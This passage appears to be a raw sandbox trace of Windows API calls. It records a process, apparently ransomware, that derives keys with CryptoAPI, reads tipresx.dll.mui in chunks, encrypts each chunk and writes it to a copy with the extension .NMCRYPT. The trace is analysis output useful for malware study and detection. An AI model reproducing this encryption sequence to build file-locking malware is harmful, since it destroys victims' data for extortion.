| out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.314] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.315] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.316] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.316] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.316] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.316] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.316] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.316] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.316] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.316] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.316] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.316] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.316] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.316] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.316] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.316] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.316] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.316] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.316] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.316] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.316] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.316] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.316] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.316] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.316] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.316] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.316] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.316] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.316] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.316] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0159.316] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0159.317] CryptCreateHash (in: hProv=0x8e3198, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444944 | out: phHash=0x1d444944) returned 1 [0159.317] CryptHashData (hHash=0x9ad3b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.317] CryptDeriveKey (in: hProv=0x8e3198, Algid=0x6610, hBaseData=0x9ad3b8, dwFlags=0x4, phKey=0x1d444948 | out: phKey=0x1d444948*=0x9ad438) returned 1 [0159.317] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0159.317] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0159.317] wcslen (_String="\\\\?\\") returned 0x4 [0159.317] CryptDuplicateKey (in: hKey=0x9ad438, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad738) returned 1 [0159.317] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0159.318] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nb-NO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0159.318] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8192) returned 1 [0159.318] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0159.318] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.319] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.319] GetLastError () returned 0x0 [0159.319] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.320] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.320] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.320] GetLastError () returned 0x0 [0159.320] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.320] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.321] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.321] GetLastError () returned 0x0 [0159.321] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.321] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.321] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.321] GetLastError () returned 0x0 [0159.321] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.321] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.321] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.321] GetLastError () returned 0x0 [0159.321] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.321] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.321] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.321] GetLastError () returned 0x0 [0159.321] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.321] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.321] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.321] GetLastError () returned 0x0 [0159.321] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.321] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.321] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.321] GetLastError () returned 0x0 [0159.321] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.321] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.321] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.322] GetLastError () returned 0x0 [0159.322] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.322] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.322] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.322] GetLastError () returned 0x0 [0159.322] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.322] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.322] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.322] GetLastError () returned 0x0 [0159.322] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.322] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.322] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.322] GetLastError () returned 0x0 [0159.322] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.322] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.322] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.322] GetLastError () returned 0x0 [0159.322] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.322] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.322] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, 